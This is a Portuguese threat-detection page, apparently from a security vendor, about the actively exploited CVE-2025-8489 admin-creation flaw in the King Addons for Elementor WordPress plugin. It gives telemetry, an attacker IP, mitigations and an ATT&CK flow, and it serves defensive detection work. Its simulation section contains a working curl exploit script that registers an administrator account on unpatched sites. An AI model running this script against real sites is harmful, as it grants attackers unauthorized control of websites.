Vulnerabilidade Crítica no King Addons para Elementor em Exploração Ativa
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Uma falha crítica de escalonamento de privilégios não autenticada (CVE-2025-8489) no plugin King Addons para Elementor do WordPress permite que invasores registrem novos usuários com privilégios de administrador. A falha tem sido explorada ativamente desde 31 de outubro de 2025, com o Wordfence bloqueando dezenas de milhares de tentativas. Os invasores exploram o problema por meio de solicitações POST elaboradas enviadas para o endpoint admin-ajax.php. As versões 24.12.92 a 51.1.14 são afetadas, com uma correção disponível na versão 51.1.35.
Investigação
A telemetria do Wordfence registrou mais de 48.400 tentativas de exploração, com um aumento notável em 9–10 de novembro de 2025. O endereço IPv6 de origem individual mais ativo foi 2602:fa59:3:424::1. Cargas úteis maliciosas utilizam dados POST HTTP que configuram o parâmetro user_role para administrador durante o fluxo de trabalho de registro. Nenhum adicional de malware foi observado além da criação de contas administrativas fraudulentas.
Mitigação
Atualize o King Addons para Elementor para a versão 51.1.35 ou mais recente. Ative as proteções do firewall do Wordfence lançadas em 4 de agosto de 2025 (premium) e 3 de setembro de 2025 (gratuito). Audite as listas de usuários do WordPress para contas de administrador inesperadas e revise continuamente os logs em busca do padrão POST suspeito.
Resposta
Acione alertas no tráfego POST para /wp-admin/admin-ajax.php que inclua user_role=administrator. Bloqueie endereços IP abusivos, com atenção especial ao endereço IPv6 destacado. Realize verificações de higiene de contas e remova qualquer usuários administradores não autorizados. Implante assinaturas IDS baseadas em host ajustadas para a estrutura de solicitação observada.
mermaid graph TB %% Class definitions Section classDef technique fill:#ffcc00 %% Node definitions tech_exploit_public_facing[“<b>Técnica</b> – <b>T1190 Explorar Aplicação Pública</b><br />Adversários exploram uma aplicação pública para obter acesso inicial.”] class tech_exploit_public_facing technique tech_exploitation_priv_esc[“<b>Técnica</b> – <b>T1068 Exploração para Escalonamento de Privilégios</b><br />Adversários exploram uma vulnerabilidade de software para aumentar seus privilégios no sistema.”] class tech_exploitation_priv_esc technique tech_account_manipulation[“<b>Técnica</b> – <b>T1098 Manipulação de Conta</b><br />Adversários criam, modificam ou excluem contas para alcançar seus objetivos.”] class tech_account_manipulation technique tech_valid_accounts[“<b>Técnica</b> – <b>T1078 Contas Válidas</b><br />Adversários obtêm e utilizam credenciais legítimas para acessar contas.”] class tech_valid_accounts technique %% Edge connections showing attack flow tech_exploit_public_facing u002du002d>|conduz a| tech_exploitation_priv_esc tech_exploitation_priv_esc u002du002d>|conduz a| tech_account_manipulation tech_account_manipulation u002du002d>|conduz a| tech_valid_accounts
Fluxo de Ataque
Detecções
Exploração da Escalabilidade de Privilégio do King Addons para Elementor [Servidor Web]
Visualizar
IOCs (IP de Origem) para detectar: Invasores Explorando Ativamente Vulnerabilidade Crítica no Plugin King Addons para Elementor
Visualizar
IOCs (IP de Destino) para detectar: Invasores Explorando Ativamente Vulnerabilidade Crítica no Plugin King Addons para Elementor
Visualizar
Possível Tentativa de Exploração do CVE-2025-8489 (Escalabilidade de Privilégio WordPress King Addons) (via servidor web)
Visualizar
Execução de Simulação
Pré-requisito: O Check de Pré-voo de Telemetria & Linha de Base deve ter sido aprovado.
-
Narrativa e Comandos de Ataque:
Um adversário descobre CVE‑2025‑8489 no plugin King Addons para Elementor. Eles elaboram uma requisição POST paraadmin-ajax.phpque inclui oparâmetro action=king_addons_user_register(necessário pelo plugin)andforça o papel do novo usuário aadministradorviauser_role=administrator. Ao enviar esta solicitação diretamente para o endpoint vulnerável, o invasor obtém uma conta privilegiada do WordPress sem precisar de autenticação prévia. A carga é codificada em URL para replicar um cliente web realista. -
Script de Teste de Regressão:
#!/usr/bin/env bash # Exploit script para escalonamento de privilégio do King Addons para Elementor (CVE‑2025‑8489) TARGET="http://webserver.example.com" ENDPOINT="/wp-admin/admin-ajax.php" # Dados POST elaborados (codificado em URL) POST_DATA="action=king_addons_user_register&user_login=eviladmin&user_email=evil@example.com&user_pass=P@ssw0rd!&user_role=administrator" echo "[*] Enviando payload de exploração..." curl -s -o /dev/null -w "%{http_code}" -X POST "${TARGET}${ENDPOINT}" -H "Content-Type: application/x-www-form-urlencoded" --data "${POST_DATA}" echo -e "n[+] Exploit enviado. Verifique o SIEM para o alerta gerado." -
Comandos de Limpeza:
# Remova o usuário malicioso criado durante o teste curl -X POST "http://webserver.example.com/wp-admin/admin-ajax.php" -d "action=delete_user&user_id=$(curl -s "http://webserver.example.com/wp-json/wp/v2/users?search=eviladmin" | jq -r '.[0].id')" echo "[*] Limpeza concluída."